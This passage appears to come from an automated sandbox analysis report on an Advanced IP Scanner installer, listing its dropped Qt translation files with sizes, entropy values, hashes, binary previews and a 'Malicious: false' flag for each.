Preview:	<.d....!..`...B..........U....;.......;...U...;...g...;.. ....;..@....O..W....[..S....^...)...^..O...(5......G.......H,..L...K...=H..N:......V...B..._...X.......'.......M....y..M................d......T....t..)5...t..M....t..W......>....j...5..5t......@...?...H5..U...f....I......B........i.......%...~..1<...`..5 ...e..W.......W+......... =...C...y......y...3..%..#v..0..#..+.....s.+.......+......+......+....%Q.G.....A.G....)..H0...WW.Hw9...C.Hw9...s.I....'<.J6......J6......J6......J6...F/.LD......L.b..W..M.S..>..R.....".V.....o.Wi...V..W.T.....Z.\|..N..[f3..R^.gc....N.w0K..D...H...$Q......Xz...T......."..2....~..4... d..C=...T..,...2...........V ......\K.9.E..=..L.#..^..M$o.....e.......l8...4i...^..Fb..I....8......@.......O.......U...>......>...f..3..-...l...G.......7..5.l..[9.AV...&..y....T%...0..PT......OM......Uy..tb..3........?.......g......P.......:.......K..(....O..1V...(..R....0;.W.<..[..f.~.. .......2...1........^..3....5..........x...c..C..;6...]m.q.J..Lh..I....O..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_nl_nl.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28029
Entropy (8bit):	4.645006029092153
Encrypted:	false
SSDEEP:	384:nsoeTpwn8BLKep+1uYLGPlUMpitDd0FoTGv8QAyEDPQRBHYerHcgDOIq0IDbn8:nsoeTpXr+KiBd0qTayPQRdBv
MD5:	1DCBBF653BCB4D127D902EAB60CBB42A
SHA1:	BDC0ACD9FEE35B3F1446210A45C5B20ED9987F8A
SHA-256:	F1C9FB8580866B3066DD4BA9A559F3161B4E3240831A8439F9720B12B40FA010
SHA-512:	9A85094294FB5884BDD548E7BEDFCB97760ABE61ED76AAC5EF2E7AF6127EBEC33D1F16FF3DB7FC59FB294C12F3E78E2547BABB4A992864B13CC3BAC7DB0C8F22
Malicious:	false
Preview:	<.d....!..`...B..........YP...;.......;.......;.......;..!o...;..C....O..\....[..W....^..0)...^..S...(5......G....H..H,..P...K...@P..N:...J..V...EA.._...]B......) ......P....y..QM...............R......Y&...t......t..Q....t..[......A,...j......5t......@...C...H5..Y...f...0I......E....................~..3....`..7....e..[;......[c.......B. =...F...y......y......%..$..*.0..%..+.....5.+.......+....h.+......+....&..G.... ..G....+-.H0...[..Hw9...S.Hw9.....I....(..J6....x.J6......J6......J6...I..LD......L.b..[..M.S..A..R.......V....0s.Wi...Z..W.T.....Z.\|..R..[f3..Vn.gc....Z.w0K..H...H...%.......\....T...9..."..5....~..74.. d..Fg...T......2....7......ZP......`..9.E..@..L.#..cO.M$o.....e.......l8...6....^..I...I....Z......CF......Sw......Z...>...m..>......3../...l...K@......:>.5.l.._..AV...(q.y....Xa...0..TF......S9......Y...tb..5................Q......T.......=.......O`.(....S..1V...)..R....2..W.<..`%.f.~.."4......4...1....A...^..6;...5..............c..F..;6...a..q.J..P,..I....=..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_pl_pl.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28357
Entropy (8bit):	4.7436866012778625
Encrypted:	false
SSDEEP:	384:5ph1weyWuzmrQaIBqQKp8GweGs4G4fc/xrRFkTMNa1xsEG07LXjXu:5pQeyWuzmMvBqQQ8GfGsQfcJUTM7S6
MD5:	45864510329D981D80C616641357FEFF
SHA1:	C4EB7D6D98D29656FA2DE8E9923750556408E865
SHA-256:	3A3F6762C19E934B6FBE1EF38E0D68A96E8A3B7B27E196655CFA8C257529A947
SHA-512:	93E671353C5C4E2F39656EE64758556BDF2FFA6185F4A4991C12B432870C830D1BACB772FD0CD0F71AF7E088D363AC1475BBA2FBCE6797D992D01BA407915D83
Malicious:	false
Preview:	<.d....!..`...B..........Z....;.......;...%...;.. #...;..!....;..D....O..]\...[..Y"...^..0....^..T...(5......G.......H,..Q...K...@...N:......V...E..._...^.......).......R....y..Rq......................Zj...t..+K...t..R....t..]......A....j......5t......@...C...H5..['..f...0.......F....................~..3....`..8....e..\y......\.......... =...G...y......y......%..%~..0..%..+.....;.+......+......+....r.+....'?.G....!..G....+..H0...\..Hw9.....Hw9.....I....)4.J6....p.J6......J6....h.J6...J..LD......L.b..]4.M.S..B .R.......V....0..Wi...\$.W.T...e.Z.\|..S..[f3..W~.gc....j.w0K..I...H...&U......^ ...T...+..."..5p...~..7... d..G-...T......2....'......[.......b..9.E..A(.L.#..d..M$o.....e.....B.l8...7=...^..J...I....T......C.......T.......[Q..>...9..>......3..0A..l...L8......:..5.l..`..AV...(..y....Y....0..Uf......Ta......Z...tb..6.......................U.......>Z......P`.(....U..1V...(.R....2..W.<..a..f.~..".......5...1........^..6....5..........>...c..G~.;6...c..q.J..Q<..I....;..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_pt_br.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28217
Entropy (8bit):	4.655652026218731
Encrypted:	false
SSDEEP:	768:NPgRUervlMMfgdhrAnEL326U24PonYBmC:N4RUetCHjHeQU
MD5:	C8AF2228F3F331635F1E4E55E1C9FD32
SHA1:	9AD8E149DDA58030C3D4104D653DCEC0AD534F9E
SHA-256:	16F95D32D808EA146F522FA230D65A635892CC54DF8014D40A9DD7774F234EDF
SHA-512:	DAD7F44C031D159500E39DC27E7F8B67165EA04EBBEEC71BECEF57CCEC66B85F0E26B6D319F3D4305CD42D95480CE03C0DAFBCA2B1C9EEE78A2FE3699606BDF0
Malicious:	false
Preview:	<.d....!..`...B..........Y....;.......;.......;.......;..!....;..DV...O..\....[..X....^..0o...^..Td..(5......G....v..H,..QV..K...@...N:...h..V...E..._...^"......)N......Q....y..Q.......................Y....t..+....t..Rl...t..\k.....A....j......5t......@...C...H5..Z...f...0.......Fd...................~..3j...`..8....e..[.......\........N. =...G...y......y...Y..%..%...0..%E.+.....;.+.......+....n.+......+....&..G.... ..G....+a.H0...\A.Hw9.....Hw9.....I....(..J6....j.J6......J6......J6...JM.LD......L.b..\..M.S..B..R.......V....0..Wi...[..W.T.....Z.\|..SA.[f3..W..gc....D.w0K..H...H...%.......]....T...A..."..5r...~..7... d..F....T......2....G......Z.......as.9.E..A..L.#..d..M$o.....e.......l8...7E...^..J...I....^......C.......T.......Z...>...Y..>......3..0...l...L.......:..5.l..`..AV...(..y....X....0..T.......S.......ZW..tb..60......................US......>(......P..(....T..1V...)..R....2_.W.<..`..f.~.."T......4...1....;...^..6....5..............c..GF.;6...b..q.J..P...I....1..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ro_ro.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28132
Entropy (8bit):	4.6803756692053184
Encrypted:	false
SSDEEP:	384:n3mvi1M9EsRNmRi55piCisjj7zBR0nD/NoK3ZNvIgN7lQQlddoAtrHquy+G:WHEsRh97FR0nDFo0ZNDWQlduR
MD5:	2DB27B87481EDE8D4FE8C92431A5C5AC
SHA1:	0FFF475A4C88E59550B83CC1F8BBC1F3A28BFC38
SHA-256:	A3881D35EE46708B0A84D512E96981D7DF563A3C547416376B7BEAF874A3946B
SHA-512:	B235CA5CADB26C9A5225CB968BB75B874A8ECAFEC3E72303FE92499A357FB7D1894C4352E6CABDDC833C9552643D2E58A67EEDF22780573674AA0D19DC84615A
Malicious:	false
Preview:	<.d....!..`...B..........Y....;.......;...O...;.. K...;.."%...;..D....O..\....[..Xh...^..0....^..T,..(5......G.......H,..Q...K...@...N:......V...E..._...].......).......Q[...y..Q.......................Y....t..+....t..RD...t..\+.....A....j.. ...5t......@...C...H5..ZU..f...0.......F................E...~..3....`..8d...e..[.......[........t. =...G...y......y......%..%...0..%..+.....{.+.....0.+......+....h.+....'u.G....!+.G....+..H0...\..Hw9.....Hw9...Q.I....)r.J6......J6....>.J6......J6...JY.LD......L.b..\X.M.S..BR.R.......V....1..Wi...[L.W.T...5.Z.\|..S..[f3..V..gc....z.w0K..H...H...&.......]<...T...q..."..5....~..7... d..G....T../I..2....e......Z.......a..9.E..AL.L.#..c..M$o.....e.....B.l8...7....^..J...I....b......C.......S.......Z}..>...y..>......3..0q..l...L.......;..5.l..`..AV...)'.y....X....0..T.......S.......Z...tb..6........I..............U.......>p......O..(....TR.1V...*h.R....2..W.<..`..f.~..".......5`..1........^..7....5..............c..G^.;6...b?.q.J..P...I....s..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ru_ru.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28292
Entropy (8bit):	5.300323619618019
Encrypted:	false
SSDEEP:	384:sPSD57jf9U4FM1xLvsxmE2Ly36cmKe+4sEQI+feD3/gXTQWym6:sPc7jf9U4FMbLymE2Ly36cmBAbI+fel
MD5:	70059C7809B9DB196A6A58588536B7D6
SHA1:	6C7C41EEEB0E59A75C0E7CA09B34E8AC9C4B8244
SHA-256:	7AFB5C93E0CCE72EAFBAB5B3CE0D82E1102A750EFE9A9F079D47ADB67F60D4A5
SHA-512:	EB4D5EE0E47975CF6FDDAB81AA86670233F385503983B4A8C60031C4BFA5C30BB02DB261CB9FDE6CF09686D749C9DE961294A1E00FD47330EB7A0EE9DCF3DED3
Malicious:	false
Preview:	<.d....!..`...B..........ZZ...;...p...;.......;.......;..!....;..D....O..]8...[..X....^..0....^..T...(5......G.......H,..Q...K...@...N:......V...FA.._...^X......)\|......Q....y..RA.......a..............Z2...t..++...t..R....t..\......A....j......5t......@...C...H5..Z...f...0.......F........s...........~..3....`..8\|...e..\M......\s......... =...G...y...b..y...%..%..%X..0..%..+.......+.......+......+......+....''.G.... ..G....+..H0...\..Hw9.....Hw9.....I....)..J6....:.J6......J6......J6...Jo.LD......L.b..]..M.S..BL.R.......V....0..Wi...[..W.T.....Z.\|..S..[f3..Wf.gc......w0K..I0..H...&;......]....T......."..5....~..8... d..Gg...T../...2...........[b......a..9.E..AF.L.#..dQ.M$o.....e.......l8...7....^..J...I...........D4......T}......[...>...A..>......3..0E..l...L.......;..5.l..`..AV...(..y....Yi...0..UN......T7......Z...tb..6................a......U.......>d......P6.(....T..1V...*..R....2..W.<..aI.f.~.."x......5n..1....9...^..7....5...1..........c..G..;6...b..q.J..Q...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_sk_sk.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27607
Entropy (8bit):	4.7796924802259895
Encrypted:	false
SSDEEP:	768:fDrEdeVx7lvwfFTCGmlTDZOqKvO2HMfhm:fDrEdolofFWGmlTDZOVGSIhm
MD5:	3AB470D0817DA632BCDA59AB7C24C08B
SHA1:	C2A643FF68C75A0573ED6A506427F3233848453C
SHA-256:	8E66FB8FB713DD256C72D5E007E041A6CD435A9A76406B9C345DFD0E3476A351
SHA-512:	A1B3A9F7AD04C9154EDF417FA3A6D80EEBCDA3A11E07588C0CEBE33A687A5B5985AD546DB4AC4CED02E1608295219807C464971CAA8F3F00ADD6E0794062F128
Malicious:	false
Preview:	<.d....!..`...B..........W....;...4...;...-...;.......;.. ....;..Bv...O..Z....[..Vr...^../I...^..RJ..(5...]..G.......H,..O..K...>...N:......V...C..._...[.......(Z......OY...y..O........9..............W....t......t..PV...t..Z7.....?....j......5t...o..@...A...H5..X]..f.../s......Dr...................~..28...`..6z...e..Y.......Y.......... =...E...y...p..y......%..$B..0..$m.+.......+.....T.+......+......+....&..G.......G....*}.H0...Z..Hw9.....Hw9.....I....(..J6......J6......J6....n.J6...H7.LD......L.b..Zh.M.S..@..R.......V..../..Wi...YZ.W.T.....Z.\|..Q..[f3..T..gc......w0K..F...H...%!......[N...T......."..4 ...~..6... d..D....T..-...2....1......X......._..9.E..?8.L.#..a..M$o.....e.....`.l8...5....^..Hp..I....`......A.......Q.......X...>...3..>......3../...l...I.......9..5.l..^#.AV...'..y....V....0..R.......Q.......X'..tb..4.......................S3......<b......M..(....Rz.1V...(..R....1=.W.<..^..f.~..!.......3...1........^..5#...5...m......<...c..ER.;6...`/.q.J..N...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_sl_si.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28344
Entropy (8bit):	4.687451491727224
Encrypted:	false
SSDEEP:	384:qjVfhQdGPdlCzQt1OY8L7HP7xpLnR0l7sY1m1ZDxE0FTlHwLGW6F0:qjthQoPdlkQt1O1Hv7xpLnul7xcFxFr0
MD5:	950906410E936E0BB5F109082105D7B6
SHA1:	C2B7B811141FDAC2DBC712095759E3C68CE77565
SHA-256:	F0DB0B2040454AE4CF27A7398C28E4C32CD0151D30AD1ED59ACC8C8C021335CF
SHA-512:	FC7A0D8B6E9D1E82E8596CCF57889B55B455D3A8036D78FB190BEDC724BC28588F68A295C42AEBBEC1623F7AE78ADACD94F2791F4008874C0B7CFFD2845181AA
Malicious:	false
Preview:	<.d....!..`...B..........ZB...;.......;.......;.......;..!}...;..Dp...O..]....[..X....^..07...^..T...(5......G.......H,..Q...K...@...N:...h..V...E..._...^h......)Z......Q....y..RS......................Z....t..+....t..R....t..\......A....j......5t......@...C...H5..Z...f...0g......F................!...~..3J...`..8"...e..\3......\].......H. =...G...y......y...]..%..%6..0..%g.+.....U.+.......+......+......+....'..G.... ..G....+m.H0...\..Hw9.....Hw9.....I....(..J6......J6......J6......J6...JY.LD......L.b..\..M.S..B&.R.......V....0..Wi...[..W.T.....Z.\|..S..[f3..Wd.gc....F.w0K..I...H...&.......]....T......."..5....~..7... d..G....T......2....M......[L......a..9.E..A..L.#..d..M$o.....e.......l8...79...^..J...I....f......C.......Ti......[...>...]..>......3../...l...L ......:..5.l..`..AV...(..y....YQ...0..UH......T%......Z...tb..68.......!..............U.......>>......PB.(....T..1V...)..R....2=.W.<..aE.f.~.."x......5...1....I...^..6....5...=..........c..Gr.;6...b..q.J..Q8..I....M..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_sr_latn_rs.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27834
Entropy (8bit):	4.7072414399522335
Encrypted:	false
SSDEEP:	384:yMPle26Dx1urq+h3DHLkcg4iYOUCfjAjQ6Jhws0WVE:yMPle22x4qkTHLkx4iYOU4jAjQl
MD5:	A3264DCBED0CEFC981230E4CCADF8807
SHA1:	0A3E5FFA3013E7D8101C3D69ED5E02589792C6A4
SHA-256:	6D2B6C8C8636AF5E7236AB5045DF6AD1239FD8D84A7EC285D3B4733539F9EE03
SHA-512:	7E5AF283C121B00DCF9FAB52DFC447F711F7B437D3B70903139EF268311A9F7978988D45EF4583023E1DBE6A7FC8FD8D06A8C7628E4D75CF49C6A15610BB59C3
Malicious:	false
Preview:	<.d....!..`...B..........X....;.......;.......;...A...;..!....;..C(...O..[....[..Wp...^../....^..S<..(5......G....$..H,..P..K...?v..N:......V...D..._...\.......(.......PS...y..P.......................X....t..m...t..Q<...t..[G.....@^...j......5t......@...BC..H5..Yg..f.../.......E\...................~..2....`..7...e..Z.......Z........6. =...Fo..y......y...]..%..$...0..$..+.....G.+.......+....x.+......+....&..G.... ..G......H0...[..Hw9...w.Hw9...Y.I....(b.J6....P.J6......J6......J6...H..LD......L.b..[x.M.S..@..R.....P.V..../..Wi...Z`.W.T.....Z.\|..R..[f3..U..gc......w0K..G...H...%.......\T...T...)..."..4....~..6... d..E....T......2....E......Y......._..9.E..?..L.#..b..M$o.....e.......l8...6I...^..I&..I....f......Bp......R.......Y...>...]..>......3../7..l...J.......9..5.l..^..AV...('.y....W....0..S.......R.......Y+..tb..5B......................T)......=.......N..(....Sp.1V...)P.R....1..W.<.._u.f.~..".......4...1........^..5....5..............c..F$.;6...a..q.J..O...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_sv_se.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27099
Entropy (8bit):	4.717079738585517
Encrypted:	false
SSDEEP:	384:VkPmHTZjXg+G4WYwtwYd5y+0hsnvrS+OrcNwNTbSHI8crD1aVVrcyVbTLiOG:V1TZjXg63qL4+usnve1ANMTV8crK8
MD5:	58ACBFB46226E1833250D5F5A7CE7D6E
SHA1:	5711848C2E2E5D5144B5F965A0F856611773A7F4
SHA-256:	7117B0D25A9C04FBEE7F8D5D9D3B2D0E5C1A02831B70D735EC24D9B056753A74
SHA-512:	DA918A21E0A58BB2CB84087F2B96C209A5C050DF658F1B66329489423A9AACAB6B66514863E14477A5FF8D0CBA654567E4865FE6777484029511C57BF0D9DD6A
Malicious:	false
Preview:	<.d....!..`...B..........V....;...<...;.......;.......;.. ....;..A6...O..X....[..T....^.......^..P...(5...e..G.......H,..M...K...=...N:...z..V...B..._...Y.......'.......M....y..N=.......q..............U....t..)....t..N....t..Xo.....>....j......5t......@...@U..H5..V...f...........C@.......u...........~..1h...`..5\|...e..W.......X.......... =...DI..y......y......%..#...0..#..+.......+.....B.+....B.+....v.+....%..G.......G....)..H0...XA.Hw9.....Hw9.....I....'..J6......J6......J6....P.J6...F..LD......L.b..X..M.S..>..R.......V.......Wi...W..W.T...s.Z.\|..Ok.[f3..S<.gc......w0K..Ep..H...$.......Y^...T......."..3....~..5... d..C....T..-+..2...........W.......]..9.E..>..L.#.._..M$o...\|.e.....P.l8...4....^..G...I....D......@.......PY......V...>......>......3...;..l...Ht......7..5.l..\#.AV...'M.y....U....0..Q ......P.......V]..tb..3.......................Q{......;V......LZ.(....P..1V...(l.R....0{.W.<..\..f.~..!\......2...1........^..45...5...Y......2...c..D..;6...^9.q.J..M$..I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_th_th.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	26514
Entropy (8bit):	5.365287004508335
Encrypted:	false
SSDEEP:	384:nUzD+5WAlXcVhAB44F7JjbP2HvOqwtew5Mg+Xl+UWZhS4vr7:nMGWAlXcV+m4F7JjbP2P9wxMg+X4f9
MD5:	31966D909B8293307AC3545ACA55CD13
SHA1:	1B49E43C0109445BA5068E2ED8422CB308D99B12
SHA-256:	81B17400011DC60FD3CDBEDA6F52E3E848B0A8C754703CD32E4DBEB82A77C14B
SHA-512:	7CF39F060267A043DEAA52C7A1F7DBA00EB24957264C349D9322BD1E8506151A566E26FAB9B45ED5FEB7140EBE05A8AC89062DAF5D2FA4AE4845735036694EE8
Malicious:	false
Preview:	<.d....!..`...B..........S....;...^...;.......;.......;.......;..>....O..VL...[..R&...^..,C...^..M...(5......G.......H,..K...K...;(..N:...x..V...?..._...W.......&.......KG...y..K................\......Sb...t..'....t..L&...t..U......;....j......5t......@...=...H5..T#..f...,g......@........M...........~../....`..3...e..Um......U.......... =...A...y......y...9..%.."...0.."7.+.....7.+.......+....f.+......+....#..G.......G....'..H0...U..Hw9...5.Hw9.....I....%..J6....0.J6......J6....b.J6...D..LD....\|.L.b..V..M.S..<n.R.......V....,..Wi...U..W.T...S.Z.\|..L..[f3..P..gc......w0K..B...H...".......W....T...s..."..0....~..2... d..A....T.....2...........T.......Z..9.E..;..L.#..]g.M$o.....e.......l8...2Q...^..DL..I....0......=.......M.......TK..>......>...^..3..+...l...E.......5..5.l..Y..AV...%o.y....R....0..Nz......Mo......S...tb..1`...............m......N.......8.......I..(....N..1V...&\|.R.....#.W.<..Zc.f.~...p......0j..1........^..1....5...O......h...c..An.;6...[..q.J..J...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_tr_tr.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27282
Entropy (8bit):	4.801156368722529
Encrypted:	false
SSDEEP:	768:ZUOMiBL2+9VpzlQLm8QKHsbWSBSj4a/sqS4uCRam1bUvmRF:boP64jf+4uCRR
MD5:	4DD48C8DA1964B46D4D972244288081A
SHA1:	1A9802C9FA07BF41FAF924E2C2DE6A9D6E6EFFC5
SHA-256:	572E3D6ABD3A7BE7F4F464DDBD53A6AE2657E8DC0427B59D9A942D8A04833323
SHA-512:	59A873E28746DA37458C3C37EC8B7E7F303E57FA6EADC3A2DCAB8456DCA625EA4A96D05B83DA434A92FE3CFB37578564B0279A9E27E85D6E8ED3EF4E7E4021E9
Malicious:	false
Preview:	<.d....!..`...B..........V....;.......;...w...;...S...;.. ....;..A....O..Y\...[..UD...^...G...^..QP..(5......G.......H,..N...K...=...N:......V...Ck.._...Z.......'.......N....y..O................j......Vr...t..)G...t..O....t..Y......>....j...!..5t...)..@...@...H5..W/..f....m......D2.......c.......S...~..1&...`..5....e..X.......X........,. =...E=..y...P..y...-..%..#...0..#..+.......+.......+......+......+....%_.G.....5.G....)..H0...X..Hw9...C.Hw9...[.I....'d.J6......J6....D.J6......J6...G..LD......L.b..Y4.M.S..?H.R.....<.V.......Wi...X..W.T.....Z.\|..PK.[f3..S..gc....v.w0K..FZ..H...$u......Z....T......."..2....~..52.. d..D....T..,...2...........W.......]..9.E..>Z.L.#..`e.M$o.....e.......l8...4....^..G...I....D......@.......Q.......WS..>......>...~..3..-...l...IR......7..5.l..\..AV...'!.y....U....0..Q.......P.......V...tb..3................c......R#......;z......M8.(....Q\|.1V...(<.R....0%.W.<..]m.f.~.. .......2...1........^..4....5..........\|...c..D..;6..._..q.J..N...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_uk_ua.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28836
Entropy (8bit):	5.274937745581086
Encrypted:	false
SSDEEP:	768:evIxSKa3n9xd9wBClaVMxIswLfg0x6WcX:eG+X7YIUVMYk
MD5:	EE64BC556D9E554E5122531BBA368240
SHA1:	C691C2D832157EF9FD50F0D2C5B91EA9B6934979
SHA-256:	11D722019F26DAEF74AF7EAE33823B4625D4EBBC33352D5EFAC85D19B2BA0658
SHA-512:	23BE3849BE62BEE12E645E01E05D45ACCB2D575F15D50643FC5658F37C6143E66BE2A80010E030C78059357F7E45FB9D9EF2E1625A59505BD74C99CA2EA749BD
Malicious:	false
Preview:	<.d....!..`...B..........\....;.......;...1...;.. G...;.."!...;..F....O.._....[..[J...^..1q...^..V...(5......G.......H,..S...K...B...N:......V...G..._...`.......F......T....y..Tg......................\....t..+....t..T....t.._;.....C....j.. ...5t......@...E...H5..]_..f...1.......H....................~..4....`..:....e..^.......^.......... =...I...y......y......%..&...0..&1.+.......+.......+....H.+....h.+....'..G....!-.G....,W.H0..._..Hw9.....Hw9.....I....)..J6....\.J6......J6....r.J6...Lq.LD......L.b.._j.M.S..Df.R.......V....1..Wi...^Z.W.T...I.Z.\|..U..[f3..Y..gc....F.w0K..J...H...&.......`D...T......."..6....~..9... d..I....T../...2...........].......c..9.E..C^.L.#..f].M$o.....e.....:.l8...9!...^..L...I....N......E.......V.......]...>...E..>......3..1...l...N.......<..5.l..b..AV...)..y....[....0..Wh......VS......]'..tb..7.......................W.......@.......Rt.(....W..1V.....R....3..W.<..cW.f.~..#.......6z..1........^..8A...5...i......L...c..Il.;6...d..q.J..SP..I....!..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_vi_vn.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27204
Entropy (8bit):	5.005345988323232
Encrypted:	false
SSDEEP:	384:OpTFOkqnz8B1NM9aQ3T07mnagn7UMHJEt5jTlAXSHjcvHrP:ORFInz8BbM9aQ3w7gaMJk0
MD5:	53839022420E21292B81995749C5BCBD
SHA1:	D050A1FD64DCA4D57F9C15B71838811F3C5CF51B
SHA-256:	44900BCBB56194E2153DD1F0963DC5947C817C2A33D3A55E39A3DCDE1FDEB66A
SHA-512:	6D93BB2E3C193F21EC86456694B447899C21CC3CCE606307E9EAB3F8A8F0D92DE75A167C94F20F8AC45BFEE5F7E9192257D5F17AF46DF44598DE77E6FB5E008B
Malicious:	false
Preview:	<.d....!..`...B..........Vp...;...`...;.......;.......;.. ....;..A....O..Y4...[..U ...^.......^..Q...(5......G.......H,..N...K...=...N:......V...B..._...Zj......((......NE...y..N................2......VH...t..)....t..O6...t..X......>....j......5t......@...@...H5..W...f...........C........q...........~..1~...`..5....e..XW......X.......... =...D...y......y......%..$X..0..$..+.......+.....J.+....R.+......+....&..G.......G....*..H0...X..Hw9.....Hw9.....I....'..J6....0.J6......J6....Z.J6...G..LD......L.b..Y..M.S..?T.R.......V..../..Wi...W..W.T.....Z.\|..O..[f3..S..gc......w0K..E...H...%1......Y....T......."..3D...~..5`.. d..D1...T..-K..2...........Wv......]..9.E..>f.L.#..`'.M$o.....e.....f.l8...5....^..GL..I....B......@.......P.......W5..>...'..>......3......l...H.......8R.5.l..\..AV...'..y....U....0..Q.......P.......V...tb..3.......................Q.......;.......L..(....Q>.1V...(..R....0..W.<..]..f.~..!.......2...1........^..4i...5...u......H...c..Dr.;6...^..q.J..M...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_zh_cn.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	21282
Entropy (8bit):	5.593895866111406
Encrypted:	false
SSDEEP:	384:yuFG9W5Ig0o3We2RYzomp0T/MpVLcLvF13fLQ:vFG9W5Ig0o3Weauoz0pVQ4
MD5:	6885AC8F42A02A32B59AA84D330925C3
SHA1:	A070B4B8BF1128197681487D332168A537107FB9
SHA-256:	2D7D17A4ECD78F916216C9E0D11897742A9AAF1E0988F60579B034319F2397D8
SHA-512:	4765739E9E45059E5A57F970133D11E8C418DE43A36602A21561A4A1027EE450AF091DA1F7BBD4CE5FD00299422679B66AC88516ACF618EA15931C3261850E9E
Malicious:	false
Preview:	<.d....!..`...B..........AX...;.......;...5...;.......;...W...;..16...O..C....[..@J...^..#E...^..=...(5......G....Z..H,..:...K....8..N:...\|..V...2Y.._...D........\......:....y..;O.......c..............A4...t...u...t..;....t..Cc...../....j......5t......@...0...H5..A...f...#e......3........g.......1...~..%h...`..(....e..B.......C........0. =...3...y......y......%......0...C.+.......+.......+....4.+....@.+.......G.......G.......H0...C?.Hw9...y.Hw9...G.I.....".J6......J6......J6......J6...5..LD......L.b..C..M.S../x.R.......V....#..Wi...B..W.T.....Z.\|..<9.[f3..?&.gc......w0K..4...H...........D....T......."..&....~..(@.. d..3a...T.."G..2....)......B<......G..9.E.....L.#..I..M$o.....e.....B.l8...(....^..5...I...........0.......<.......A...>......>...,..3..#...l...6.......*L.5.l..FE.AV......y....@....0..=.......<.......A...tb..'J......................=.......,.......9..(....=D.1V......R....$..W.<..F..f.~..........&...1........^..'....5...!..........c..3..;6...G..q.J..:r..I....U..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_zh_tw.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	21326
Entropy (8bit):	5.601982778539758
Encrypted:	false
SSDEEP:	384:4DlwToFrc4xM4iwF3sE5nARVIAgNv95UWr/LGLKbTR1Zo:4DlwTsc4O4i8sE5ncWjz5UWr/y/
MD5:	B961B562628E357221F12EB6A212860C
SHA1:	35E6905D0410CEDC12B77EA8735CEDCB74913B25
SHA-256:	5730516CB06E0DAA2F97B0772C2233345E70890A775D1850F4031FDAAB993967
SHA-512:	8A887CC03D628FDAE3F0B8A4DC4E0E71793D95AF7B561D6DDED82944E3B4D9C92CB93989A3236815D00CAEB5BC57E87809A372FC5B8509D36A54403EC2CAEB37
Malicious:	false
